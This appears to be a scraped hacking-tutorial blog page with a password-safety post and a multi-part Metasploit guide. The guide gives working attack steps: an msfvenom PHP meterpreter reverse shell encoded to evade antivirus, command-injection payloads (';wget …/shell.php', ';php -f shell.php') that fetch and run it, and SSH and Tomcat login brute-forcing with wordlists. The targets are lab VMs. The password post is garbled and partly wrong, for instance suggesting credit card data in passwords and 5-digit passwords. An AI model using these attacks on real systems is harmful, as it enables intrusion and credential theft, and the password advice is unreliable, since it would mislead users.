Kali Linux

Kali LInux Tutorials

Hacking Castle

Hacking Castle

Hacking

Ethical Hacking and Cybersecurity Tutorials

Metasploit

Hacking with Metasploit

SQLMAP

Hacking in android in termux using sqlmap

Friday, October 16, 2020

How To Save Yoursef from hackers (For Everyone)

 As technology advances overtime, it's been positively used to assist sell corporations, services or products in addition to improving websites. But at some point, it has been negatively also used by culprits to "crash" websites and businesses even hacking passwords to the software.

 As the increasing variety of instances of hackers used to hack websites or malware attack stated in information, horrific impact brought approximately via technology is also continuously rise System hacking is one of the most common issues nowadays.  

Cyber Security Threats


That is why to settle this problem, security concerns and issues have been tackled because Internet is now widely use by people from all walks of life. Whether a business is large or small, proper attention should be given like protecting and safeguarding all their network software against corrupt hackers.

 That is why it is vitally important that every system operators or administrators must use a distinctive password that can't be hacked either by an ordinary destroyer or professional hackers. As early as possible, one should be vigilant from unexpected hackers.


Basically, a person who does hacking commonly destroys software and other computer networks in order to gain more money or only encourage doing the challenge. To avoid unnecessary accidents like hacking passwords, you should take some precautionary measures not only for your systems protection but also for your own safety as well.

 That is why the need of powerful password is a must for privacy and security of your website. It ensures you the confidentiality and safety of your save data. It is a great responsibility of the user to make a password as unique as possible in a way that complicated to guess or to be discovered by anyone.


To avoid hacking on your password, the following are the points to consider when creating a virtual keyword.

 

 

avoid hacking on your password


1. When creating a password, you should enter mix information like in your credit card, bank account or any assume a name that is extraordinary.


2. A second good advice is to use alphanumeric, a combination of numbers and letters even mix with symbols. For a higher security, at least two letters that you enter should be in uppercase.


3. Creating a password should be hard or rare to be guess wherein other programs and even other people can't quickly discover.


4. A word should not an existing name regardless of any language used.


5. Don't use your initial names, date of your birth and other common words because it can be easily guessed.


6. Don't use other older accounts.


7. The password to enter should be 5-digit or more for additional security.


8. Do not try to use usual passwords.


9. Having two or more accounts for your email, you must use another password. Be sure that you will memorize your entire password to avoid failures.


10. The last but not the least tip is that try to have a list base on your common used programs like notes, excel or word to all your websites, mail boxes or either through your subscriptions and mail back to its right place or location. Your password and username use should be neat and properly organize so that you can immediately use it.


After making a virtual password into your account, should also take consider on how to secure your valuable website against from accidental attacks and cruel hackers. The following are the pointers to consider:

 

Protect Yourself



1. Install a virus protection on your software to have a complete safeguarding on your website.


2. Modify and transform your password always by selecting alphanumeric words. To avoid committing of failures, be sure that you have a list for every password and username that you made.


3. Keep updating on your use safety measure patches to avid harmful viruses that might enter in your systems like Trojans.


4. Connect to Google webmaster wherein it will help or assist you to learn on different hacking endeavors.


5. Lastly, you should always have back-ups to restore the date you save.


After reading the entire article, make sure that you follow those helpful tips so that you can be ready and alert always for any hacking attempts. 

It's up to you if you follow it or not, but it assures you to have a maximum protection for your software, network and even your invested website. 

If you're top priority is to stay away from hackers who do hacking passwords, then you should bear in mind and take into action those easy and simple tips above.

Share:

Saturday, October 3, 2020

Complete Metasploite Guide (Part-5 OS Command Injection)

 

Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack.

 I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as a code. 

So let us, first of all, go to the OWASP virtual machine. So my Ip is 192.168.56.11 It will open up our standard OWASP virtual machine welcome page, where we have all of our stuff that we need. we want to go to the bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to log in.  Press enter, and you are logged into BWAPP. then choose os command injection



So we will use burpsuite as well with the mixture of Metasploit, and with the mixture of the OWASP virtual machine. So we will be able to inspect packets in burp suite, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands.  

So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reloaded once again, we successfully connect to it. And here what we  chose is the OS command injection. 

And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see server and then this IP address address, so this basically the router, and then we have some of the other options as well. So IP address at the end is this one, it doesn't even matter. So what matters for us is what happens if we run that. And then after that we also specify ls, which is the command to list all of the directories and files in that sub directory. So we click here ls, and just as simple as that we can now see that this website is vulnerable to the command injection. 
os command injecion


It also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. 
Now, why over PHP? 
As we can see right here all these files are in .PHP, and we can actually upload the shell on this web server, and run it, make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. 

So this is where we introduce, for the first time, the msfvenom tool, which we will use in order to create the meterpreter shell. So we need to leave this and let's open a new terminal. 

msfvenom

 and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it.

#msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

 So msfvenom... now -p option will actually after that specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp. 

Reverse TCP working

 I made a simple illustration of our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good old Kali Linux machine that's for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, 

So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks nowadays have firewalls, but what firewall cannot prevent is the victim machine connecting back to us. 

Now how will we do that? 

What we want to do is we want to send the file to this machine right here. The file, so shell.php is that file and we sent it to the victim machine, and what that file would do is basically it will initiate the connection with us. 
So this file when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. 

But you might be asking, how are we going to get that file on the victim machine? 

Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. 

But if, for example, the machine isn't vulnerable to anything, which we will cover in the later articles when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer to the victim machine while they are not looking, or something like that, and then run the file. And basically, you just did all of this process by yourself, just being physically on their laptop or on their PC. 

So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell. 

So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. 

Now after you specify all of this, the next thing we want to specify is the localhost IP address. Now, what is the localhost IP address? That is the IP address of the host that's listening. Which in this case the host that is listening is you. So you as an attacker are the listening host. So, what we need to specify right here after the LHOST, then equals and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... And then we specify 10.0.2.15 

And after that, we need to specify the out port as well, and that is the port that you are listening to. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that you can select some of the other options that are actually optional. 

So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder...I covered what an encoder is in the previous article. So basically it's used to most likely bypass antiviruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. 

What else we want to specify at the end is -f, and then file to be raw, and after that, we want to specify this narrow and just save that into shell.php Once we select all of this and once we double-check all of the options that we set, you can click click here enter, and this will take a few seconds to finish. 

So, our meterpreter PHP shell is now 1503 bytes large. If you press here ls, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is our program that we will be sending to the victim machine. We created it with this command. Now there are a few things that you need to do when you make the PHP reverse shell. 

First of all, you need to add the PHP tag. since it doesn't come with that. So, this is the scrambled code. This is basically Base64 encoded code as we can see right here. This is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. So, first of all, up here we want to add this tag, and then a question mark and then PHP. So that is the opening tag, and at the end we want to add the question mark and then closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So, ctrl + O to save, ctrl + X to exit. 




And now we are good to go. The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the XAMPP Apache 2 web server. So you want to send this to your XAMPP webserver. So let us go to /opt/lampp/htdocs/, which is the location of all the programs that are available on your XAMPP web server, basically whatever path to your shell.php is, and move it to /opt/lampp/htdocs/I made one folder named shell so mine directory is /opt/lampp/htdocs/shell. And we can see that right now we have this shell.php right here. 

 now the next thing we want to do is make sure that XAMPP is running. We can see that is active and running. And right now what we want to do is go to our IP address, which is localhost/shell, 


and we can see that right here we have available online the shell.php file. Now what we want to do, we want to make that victim PC actually downloads this file. So how do we do that? Since it is vulnerable to the command injection,  you want to do is use a simple tool that is on all Linux systems, which is called wget. Now, wget is basically used to download the file.  And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command wget, and then we run localhost and we need to specify what we are downloading. So we need to specify the /shell.php since that is the name of our file that is located in the www/html folder.
Which looks like this,
 
wget  localhost/shell/shell.php
 
 
We press here enter and this will download the file for us. As we can see it downloaded shell.php just with this simple one command. So if I type here ls once again, we can see that the shell.php is in our folder.  So now if we cat it we can see that we get the entire file right here. Now this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack. So right now what we want to do is perform the command injection. 
 
So we know that there is a vulnerable input, and let's actually exploit it right now.
And let us right right now type the same command. So
 
;wget localhost/shell/shell.php 
 
Now try to find if right now it successfully downloaded the shell.php So it should be somewhere around, we successfully got the shell.php file on our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine. Now in order for you to execute this file you will need to type a certain command. But before we type that command, we need to start listening on a certain port. 
 
So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. 
 
So this is something that you will use a lot. Just type here
 use exploit/multi/handler
Metasploite exploite multi handler

 
 
If you show options, you can see that there are no options right here. So what you want to do is set the payload, 
set payload php/meterpreter/reverse_tcp 
 
and we can see that we get the whole LHOST to listen on. Now double check the port we specified in that command while we were making shell.php that the LPORT is 4444, and the LHOST is the IP address of our own machine. So we listen to our own connection. So set LHOST 10.0.2.15 
 
Metasploite exploite multi handler payload

 
 
And all I need to do is type here exploit right now, and this will wait for an incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type ; and then what we want to do is basically php -f and then shell.php. This command right here will run the PHP file. 
 
;php -f shell.php
 
And we can see if I press here Lookup, we get a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual machine, or basically this is a connection from our OWASP virtual machine, which it's IP address, and the IP address of this is our Kali Linux machine. So we successfully got meterpreter open. Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open. So what can we execute, what post exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial and take care. Bye!
Share:

Wednesday, July 15, 2020

Complete Metasploit Guide (part-4 Bruteforcing Tomcat with msf Auxiliary)

 Hello everybody and welcome back. And now let us perform another scan or another attack on our OWASP virtual machine. So, start off your Metasploit framework console. We will perform once again Nmap on this OWASP virtual machine in order to see the available services running.

we will attack the Tomcat server. But let us first run the Nmap. So 192.168.56.101 is my OWASP IP address

metasploit Nmap Bruteforcing Tomcat with msf Auxiliary


 we will attack the Apache Tomcat funding on port 8080. Now there is an auxiliary module that is in this Metasploit framework that can be used to attack it. So here it is, and we can see on Port 8080/tcp there is Apache Tomcat running. So what we will basically do is we will actually brute force the Tomcat server. 

So let us actually search for Tomcat and see what kind of available exploits and auxiliary modules we have. So, right now we are only interested in the auxiliary part.
so type 

#search tomcat

metasploit Tomcat msf Auxiliary


So, what we want to use is 

auxiliary/scanner/http/tomcat_mgr_login

Tomcat application manager log in utility. As we can see, this one doesn't have the date of when it came into the Metasploit as well. It is ranked as normal. So, let us use that one. now if you do not want to copy the module you can just type it. So, auxiliary and then tab to complete, scan, and then tab to complete, http, and then tomcat_mgr_login. 

#use auxiliary/scanner/http/tomcat_mgr_login

So once you click enter on that one you can just check it with show options. 

metasploit auxiliary options


So we can see what are the available options that we have here. Now this one has even more options  So let us see what we can do with this. 

BLANK_PASSWORDS is false. 
BRUTEFORCE_SPEED, now brute force speed we will leave on five which is max.
We can try to set threads to more so it actually goes faster. 
The other options: DB_ALL_CRED, DB_ALL_PASS, DB_ALL_USERS are not required and we will not put them. Password we do not need since we want to specify the password file list and the user name file list. 
As we can see by default, this auxiliary module has a PASS_FILE already listed. It is in usr/share/metasploit- framework/data/wordlists and then tomcat_mgr_default_users.txt. So this is a file containing passwords one per line. 
 we have it split in a password list and in a user list. So we will stick with this one since it is by default. I guess it has some good Tomcat default passwords and users. 
Proxies we do not need. 
What we do need, and what we will always need, is the RHOSTS. So we need to select the RHOSTS which is our targets IP address. So it is one 192.168.56.101, press enter. 
So we selected the RPORT is 8080 unless it is running on some other port. Now since we did the Nmap scan on our OWASP virtual machine we know that it indeed is the port 8080. So we will leave it on that. It is also a required thing. So these two things will always be required. You cannot perform scan without this. So that's important to know. 
The next thing SSL is not required. 
Stop on success. 
Now stop on success we want to set to true since we do not need to continue brute-forcing it after we find the user name and password. So let us change that. So set STOP_ON_SUCCESS from false to true,  

The next thing TARGETURI is manager/html, which is good. So this is a good path, but let's just check. So if we go to the browser, this is basically the path to the login page of the Tomcat server. We go right here and we go to 192.168.56.101. We need to specify the port since Tomcat is running on port 8080, and then we go manager/html 

Metasploit framework tomcat login page


Let's see. Yeah, of course, it does prompt us with a user name and password. So basically what we are brute-forcing Is this right here. Once we find the user name and password for this we will be able to change the settings on the Tomcat server, web server. So let us close this for now. we got the error 401 unauthorized since we didn't specify the user name and password. But, that is soon about to change, hopefully, if we find the correct user name and the correct password. 
The next thing that we need is verbose which is set to true. 
So everything is set. 

Metasploit framework tomcat scanner options


And now what we want to do is click here run or exploit. So you can use both of those words and just press your enter. 

Metasploit framework tomcat login bruteforce


We can see it goes relatively fast. It actually went faster than I thought. we did find the user name and password as we can see a plus sign right here. 
It says login successful, root and owaspbwa. Root is the user name and password is owaspbwa, which we will soon check. But let me just try to run this, it went too fast. 
And now let's actually use this username and this password to log in to the webserver. So we reload this page. It will ask us for user name which is root, and the password which is owaspbwa. We press here OK, and we can see that we successfully logged into Tomcat web application manager, where we can now change all of these settings if we want to. And this shouldn't be available to us at all as a user of the website. So that'll be about it for this attack. We covered the Tomcat auxiliary module.

Metasploit framework tomcat login


We used scanner/http/tomcat_mgr_login, which we used to brute force the Tomcat on port 8080, and we successfully did it. So that would be it for this tutorial. In the next tutorials we will start off with some of the exploit modules and we will try to exploit some of the more advanced things, such as PHP injection, command injection, we want to get the Meterpreter shell back. So that would be about it for this tutorial and I hope I see you in the next one.

Happy Hacking..
Share:

Tuesday, July 14, 2020

Complete Metasploit Guide (part-3 Bruteforcing SSH with Auxiliary)

 Bruteforcing SSH login with Metasploit Auxiliary


right now what we want to do is basically just start with some of the auxiliary modules that are in the Metasploit framework. So we want to basically scan the machine with msfconsole. Now let us, first of all, start the MSF console. Now if you did start the Postgresql before this started, so this can run faster. 

But while this is starting I also want to start my OWASP virtual machine. whether it is Metasploitable one or Metasploitable two, you can also run that one as well.

I am using OWASP. I will show you some of the attacks you can perform on owasp broken web application. But some of the attacks are also similar for OWASP and for the Metasploitable. So just start any of those two machines.as we remember this is a virtual machine. It will prompt us with entering our user name and password, which is the user name is a root and the password is owaspbwa. 

We get the standard command-line tool. Let us just first check the IP address of this so we know it. So the IP address of our OWASP virtual machine is 192.168.56.101.you can run a bunch of different commands, or basically all the commands we run from our regular terminal you can also run from the Metasploit framework command line. 

First what we want to do is let's first take a good scan of the OWASP virtual machine. Now we covered Nmap before, so what we want to do right now is 
Nmap -sV 192.168.56.101
so we can get the version from the services running on certain ports, and then we specify the IP address of our OWASP virtual machine. Or in your case, if you're using Metasploitable, of your Metasploitable machine. To execute this. And now we wait for this to finish. It should prompt us with all of the open ports. 


Metasploit framework Nmap


It should prompt us with the services running on the open ports. And it should prompt us with the version of those services running, which can be useful especially when you use the Metasploit framework. So what we will do is we will try some of the certain attacks on this. Now we can see that the scan has finished in 33.9 seconds. 
So we get the open ports, and let's start off with the SSH port. Now here are a bunch of these other ports such as 139 and 445 running Samba smbd versions 3 to 4, which is also a vulnerable software. You also have it on Metasploitable, I believe, the same version. I will show you how you can exploit it later on. But for now, let us start off by trying to get in over the SSH. 

So we can see that the service running is  SSH on Port 22, and the version is OpenSSH 5.3p1 Debian 3ubuntu4. So what we will do is we will use the auxiliary module that is in the Metasploit framework, and we will try to brute force the SSH on Port 22 from our OWASP virtual machine. Or if you're running Metasploitable, once again, from your Metasploitable the process is the same. So let us try with searching SSH. 

search auxiliary/scanner


Metasploit framework auxiliary SSH


Now this will print us all of the available exploits auxiliary modules, post exploit modules for the SSH. What we are searching for is a scanner, and the scanner has to be the login. So here it is
auxiliary/scanner/ssh/ssh_login.
 Now it does not have the date when it came out and is it is ranked as normal, and it says the SSH login check scanner. Which basically means the SSH bruteforcer. Now you can also, for example, check the SSH version before you start that. So auxiliary scanner SSH version, SSH version scanner, 

let's, first of all, start with that one. I believe it will give us the same thing that the Nmap gave us, which is the version of the SSH. Now you can use this instead of Nmap since sometimes Nmap won't give you the version, and I believe this one is actually more detailed. 

So as we saw in the previous article, in order to pick any of these, you just type use and then the name of the module itself.  And what we want to do is show our available options. So we can see that we have four different options and they are all required. Most of them are already selected for us. So the RPORT, for example, is selected as 22 which is good. SSH is most likely always, and also by default, is running on Port 22. If it is not you would want to change this. 

Thread is the number of threads basically running during this process. Now the more threads, the faster this process will go. So depending on the power of the virtual machine you can select, for example, Now we also covered the set command, so you set basically all of these options with just set command, and then the name of the option you want, and then the number.

Metasploit framework SSH version

The only thing that we need to select right now is the RHOSTS. So the RHOSTS is basically the target address for our OWASP virtual machine. It is basically an IP address of your target. So set RHOSTS, we know it is 192.168.56.101, and now if we show our options again in order to check if everything is good, we will be able to run this. Now if you just run this, so just type in run, this will probably... here it is. This will print out the SSH version that it is running on the target software, or on target port 22. As we can see, SSH version this one, and it gives a bunch of other options as well that could be potentially useful to you. 



Now, this is a simple scan that we did for the first one, but now let's actually try to brute force this SSH on Port 22. So let us go to our available auxiliary modules, and what we want to use is the SSH to log in one. So just select the 
auxiliary/scanner/ssh/ssh_login
  copy, paste it, and then we can see that it changed the module., and let's show our options. Now you can see unlike the last one, this one has a lot of different options that we need to specify.

Metasploit framework SSH login option


Now some of them are required and some of them are not. 
For example, BLANK_PASSWORDS are not required. The next things we need, these are all not required. 
Password to authenticate with, no. Well basically you would use this if you already knew the password side, you see the point of this option right here. 
What we do want is the RHOSTS, the same as in the previous scan. So just type your set RHOSTS and then the IP address of our target machine. So 192.168.56.101,. 
And also what you would want to set, basically let's set threads to be 3 So 
set THREADS 3
 RPORT is correct and it is 22, 
stop on success false, stop guessing when a credential works for a host. So you want to set this to true since there is no real point in continuing the brute force, unless you want to on multiple accounts after you find hosts that actually work. So on credentials that are useful. So we type in 
set STOP_ON_SUCCESS true
 so you can just press tab in order for it to fill the rest of the name, and you can set this from false to true. And we can see that stop on success is now set to true for both. 
You also want to set to true so you can see all of the attempts that they're running. Now you do not need to, basically, I always set it to true so I can see the attempts of a brute force that we covered already. 
we should have all of our options set and ready to go. Now I believe there is something else we need to use which is the password list since this doesn't have a password list pre-specified I believe. 
So what we want to use is basically...let us try to find our simple password list. So let's open up a second terminal. So new window, and we know that there are some passwords in the usr/share/wordlists. 
we won't use like the rockyou.txt. It would take forever. These large passwords are most likely the best choice for the Wi-Fi cracking. For the brute-forcing, it's really not that good of a choice since it's not as fast as the Wi-Fi cracking. It's not nearly as fast. 
If you dont have these wordlists in /usr/share folder then simply get them by using cammand

apt install wordlists

So what we want to do is go to the Metasploit, type here ls, and we will see some of the password lists that are in Metasploit. 
So we do not need to really crack the SSH, we just need to show you the process of cracking it, and we will choose any password list we want. So let's say we choose this one, 
mirai_user_pass.txt 
 Now what that means, I believe, is that it also has both user and password. Yeah, it has both user and password separated with the space. So we will use that and we will see the available option for that right here, which would be the user pass file. So file containing users and password separated by a space, one pair per line, which is exactly what we selected. 
So we need to set this option right here. So let us set that option. 
set USERPASS_FILE 
and then we specify the path to the word list. So it was 
usr/share/wordlists/metasploit and then mirai_ user_ pass.txt
 So we set the path to our brute force list, or basically password and user name list. And now if we show options once again, I believe now now we should really be good to go. 

Metasploit framework SSH login option


So let us run this. We press here run and it should start brute forcing the SSH on port 22. As we can see it is starting different types of the usernames and passwords. It is going by that list that we specified. So these are all failed ones. And if it reaches one that actually exists it will stop and it'll prompt us with a success. So here we can see root:admin, admin:admin, root:root, and some of the other passwords.


Metasploit framework SSH login bruteforce



Metasploit framework SSH login


I just wanted to show you some of the different types of SSH auxiliary modules that you can use. So we saw how we can actually scan the version of SSH. We also saw how we can brute force the SSH. Now you can actually try this both on Metasploitable and on the OWASP machine. I'm not really sure if this password list has a username and password for those machines, so I added them in the list to show you how it works. 

So now you can use any password list you want and actually hope that you will brute force the SSH. So, that would be it for this tutorial. In the next tutorial,, we will cover another auxiliary module that we will use to attack another service running on our OWASP virtual machine. So that'll be it for this tutorial, and I hope I see you in the next one.

Happy Hacking..
Share:

Sunday, July 12, 2020

Complete Metasploit Guide (Part-2 Understanding all Modules)

 In this article, we will be going to see all types of modules in the Metasploit framework. basically an understanding of each module in detail.
So let us actually we going to take a better look at the structure of the Metasploit framework itself. and the first thing you want to know is where are all the modules, encoders, payloads, exploits actually stored. So they are stored in the user. 

 /usr/share/metasploit-framework

 just cd user, share, and then you go to the Metasploit framework. Once you change directory to that, you can just type ls and you will see a bunch of these files


Metasploit framework module


 and I will show you what are the more important ones and the ones that we will use. 

Now, let's see, first of all. So the first one is the 
msfconsole
It is used as a program to run the console itself and actually perform the attacks. 
Now one of the also important ones is the msfvenom
Now, this program we will use in order to create our payloads, our meterpreter shells, and back doors. So we do that with this command line right here. 
And also you can update your Metasploit framework with the msfupdate command. 
Most of the others are not so important at the moment. Now if you want, it's good to know that the Metasploit framework and all of the exploit are written in Ruby, which is a programming language similar to Python. So if you know that language it is also a plus.

Now in order for you to find all of the exploits and payloads you need to go to the modules directory. Everything is stored in there. 

Metasploit framework  modules


So if you go into the modules, and type ls here, you will see that we have all of the things we want to understand. 
So we have auxiliary, encoders, evasion, exploits, nops, payloads, post
Now let us explain all of those in detail. 

Exploits

exploits are basically used to target vulnerable software running on a remote machine. these are some of the exploits which can help us to take advantage of vulnerable systems to gain access to it. 

So let's actually change our directory to exploits, and cd exploits, and type ls, and you will notice that you have different exploits for different types of operating systems and different types of platforms such as browsers. 


So for example you have Linux, Windows, Unix, Solaris Android, Apple exploits. Also, browser exploits as we see Firefox. There are a bunch of these separated directories for different types of exploits.

Metasploit framework  exploits


 So let's actually try to find the exploit that I talked about in the previous article. The one for the Windows 7 and Windows 8 machine, I believe, it is the Eternal Blue exploit from 2017. It is a Windows exploit. So we go to Windows, and we type in ls, there is a future division between all of these exploits, as we can see in  image up. Some of them are mostly divided by the port number or the servers that they're running on a certain port. 

For example, we can see HTTP, it is running on port 80. We can see ssh, port 22. Ftp, port 21. We can see SMB, port 445 I believe. So let us go to the smb since there is the Eternal Blue exploit. If I type here ls, you will see a bunch of these different exploits used for the SMB. Now here it is, the eternalblue_win8.py exploit. We also have the regular Eternal Blue exploit. 


Metasploit framework  exploits smb


And most of these are .rb which basically stands that they are Ruby files. And the ruby exploits are just written in Ruby, as I said before. 

So if you wanted to you could actually nano some of them in order to see what they look like. So ms1let's see what Eternal Blue looks like. So .rb, and we can see the code of the exploit itself. So it is written in Ruby as I said. You can check out a bunch of these things right here. 


Metasploit framework  exploits smb code


Now I do not know Ruby, so I will not be actually explaining what all of this does. It is similar to Python. You can actually understand it if you did learn some of the programming languages before. But from now on, I just wanted to show you the simple code behind this exploit. 

So let's close this, and let's actually go back to the module. So change our directory back to the modules, and let's talk about, the payload. 

 Payloads

Payloads are files that can allow us to take access or control of the system. payloads are simply owns attackers a system that they are injected in.
for example- rootkits.

So for the payload directory, lets change first of all the directory to payloads, and type ls in order to see what we have. And here we have different types of payloads.

 As I said before, those are files that we send to the victim. For example, back doors. Now as we can see there are three types right here, singles, stagers, and stages.

Metasploit framework  payloads


Now singles are basically used to, they are smaller payloads and they're used to actually perform only one action.
for example - single keylogging payload

Stagers right there, they can be used to deliver another payload. also, use to communication between attacker and target.

 And these stages are some of the larger payloads, which given almost full control of the target. 
For example, the outer shell that we will use in most of our attacks which consist of meterpreter shells. 

Now, what is a meterpreter shell
That is basically a shell with a bunch of different options that we can use after we exploit the remote system. So we can actually screenshot the desktop, we can run a keylogger, we can bypass antivirus, and we can do a bunch of this stuff with the meterpreter shell. So it gives us a bunch of options to use. We can upload the other payload as well with meterpreter. We can download files, upload files and some of the other things that we will cover in the next tutorials. So that'll be about it for the payload. 


Let us check what else we have. So we have an auxiliary.

Auxiliary 

the auxiliary is a collection of different functionalities that is widely used while hacking. it gives variety of functions to enumeration, scanning, and brute force target.

Metasploit framework  auxiliary


 So let us go to the auxiliary modules and just type here ls, and you will see that they're divided also in different types. 
So we have fuzzers, spoofers, sniffers, different types of auxiliary modules. But most likely auxiliary will only be scanners that you'll perform on a target. 

So for example you can scan if your target is vulnerable to some type of attack. And sometimes auxiliary modules are also used to brute force, for example, SSH, Tomcat, and other different stuff that we will also cover in the next article. 

You can check out all of these other subdirectories, if you want to, and see what does it have in them. some of the auxiliary modules written in the Ruby language. 
So that'll be about it for the auxiliary. 

 
Now let's talk about the encoders. 

Encoders

As the name suggests encoders are used to encode exploits and payloads so that they can bypass the security system.

So if I type here ls you will have the encoders. Let's go to that directory. 


Metasploit framework  encoders


these are the encoders for different types of machines. So encoders are mostly used to bypass antiviruses. Now you can change how the code looks with the encoder, or you can scramble the code and then the antivirus database can't recognize it. 

Now how the antivirus databases work, or basically how does most of the antivirus work, is they have a huge database where they have all of the known exploits. All of the known viruses, Trojans and malware, basically, that they have in their database. And once you run one of the programs on your PC which is malware, and it is also known to that database, your antivirus will prevent it from running and it will delete it. 
But if you for example change the code a little bit and scramble the code, or even better write the malware yourself, most likely most of the antivirus won't be able to detect it since it is the first time that they see code like that. And that code is not in their database, so therefore they cannot really detect that code. And then they run it as a normal program and not as malware. 
That's why, ... that's why coding your own malware is a big advantage. So that would be about it for the encoders. We will also show how to use them later on. 

 Post

So the post right here is basically some of the tools or programs that you will use after you exploit the target.  which normally called post-exploitation.

Metasploit framework  posts


in the post you will find capture, escalating privileges, gathering information, manage, recon and WLAN.
For example, you send meterpreter which is a reverse shell that we will use. You can upload from the meterpreter other post-exploitation programs that you can use together, 
password gathering, or basically any other information gathering you want. You can gather cookies etc. if you want to from the certain browser. 

 Nops

It is short for no operation. It is basically a command in the assembly language and it just performs no operation. nop causes a system or processor to do nothing at the entire clock cycle.
which is very useful in buffer overflow attack.


Metasploit framework  nops

   
Well, basically if you have ever encountered an assembly code, or if you're an assembly programmer as well, you will most likely know what nops are.  

Now, this is most popularly known for on X86 chips at 0 x 90 bytes. So this is the byte are not instruction. When a processor loads this instruction it simply doesn't do anything. It basically just keeps the instructions until it comes to the next useful instruction. It doesn't, it just does nothing for one cycle, and then advances the register to the next instruction. 

Now, why are these nops useful? 

Well, basically the nops keep the payload size consistent. The practical importance of this has to do with writing instruction jumps. Now if you do not know what instruction jumps it doesn't really matter that much. but jumps can either be relative or absolute. Basically, if you move data around at all with an absolute jump, you must recode an absolute jump to it. If you move one instruction around relative to another, you must also recode the relative jump. Putting nops basically simplifies the problem because a jump that lands anywhere in a series of nops will continue on the first executable instruction, and prevent the processor from reading an invalid code that could stop execution and crash the software. 

So basically from all of this you just need to remember that nops is an instruction which is referred to as a byte zero, or a byte 90, and basically doesn't do anything. So, that's what you need to know. 
We will probably use it later on in some other section. 

these are all modules of the Metasploit framework.
now on this would be enough for you to understand the basic structure of the Metasploit framework in the next Article, 

we will actually start covering some of these scanners and exploits that we can use on our vulnerable targets. So that would be it for this tutorial and I hope I see you in the next one.
Share:

Popular Posts